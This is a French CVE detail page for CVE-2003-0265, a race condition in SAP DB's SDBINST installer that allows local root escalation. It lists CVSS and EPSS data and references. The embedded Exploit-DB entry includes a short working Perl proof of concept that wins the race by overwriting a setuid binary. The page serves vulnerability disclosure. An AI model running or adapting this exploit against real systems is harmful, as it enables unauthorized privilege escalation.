CVE-2003-0265 : Détail

CVE-2003-0265

0.2%V4
Local
2003-05-08
02h00 +00:00
2016-10-17
11h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Race condition in SDBINST for SAP database 7.3.0.29 creates critical files with world-writable permissions before initializing the setuid bits, which allows local attackers to gain root privileges by modifying the files before the permissions are changed.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.2 AV:L/AC:H/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 22531

Date de publication : 2003-04-22 22h00 +00:00
Auteur : Larry W. Cashdollar
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/7421/info SAP Database SDBINST has been reported prone to a race condition vulnerability. It has been reported that the SAP Database install tool SDBINST may perform operations non-atomically when installing the SAP database. This condition may open a window of opportunity for a malicious user to replace one of two SAP Database files with a malicious file, before SBDINST sets the setuid bit on the files. An attacker may exploit this vulnerability to gain root privileges. #!/bin/perl while (1) { $test =`grep -sh PRECOM.ins /tmp/sapdb-server-linux-32bit-i386-7_3_0_29/y/config/install/LIST*`; if ( $test =~ /PRECOM/ ) { system("cp /home/lwc/run /usr/sapdb/depend/pgm/lserver"); exit(1); } }

Products Mentioned

Configuraton 0

Sap>>Sap_db >> Version 7.3.29

    Sap>>Sap_db >> Version 7.4.3.7_beta

      Références

      http://www.securityfocus.com/bid/7421
      Tags : vdb-entry, x_refsource_BID
      http://marc.info/?l=bugtraq&m=105232424810097&w=2
      Tags : mailing-list, x_refsource_BUGTRAQ